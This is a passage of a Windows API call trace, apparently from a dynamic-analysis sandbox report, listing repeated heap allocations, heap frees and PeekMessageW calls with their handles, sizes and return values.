dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.903] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.903] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.904] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.904] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9138 | out: hHeap=0x4970000) returned 1 [0129.904] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0129.905] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.905] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.905] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.906] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.906] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.907] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.907] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0129.908] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0129.908] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.908] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.908] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.909] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0129.912] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9138 [0129.912] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9638 | out: hHeap=0x4970000) returned 1 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9638 [0129.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.912] HeapFree (in: hHeap=0x4970000, 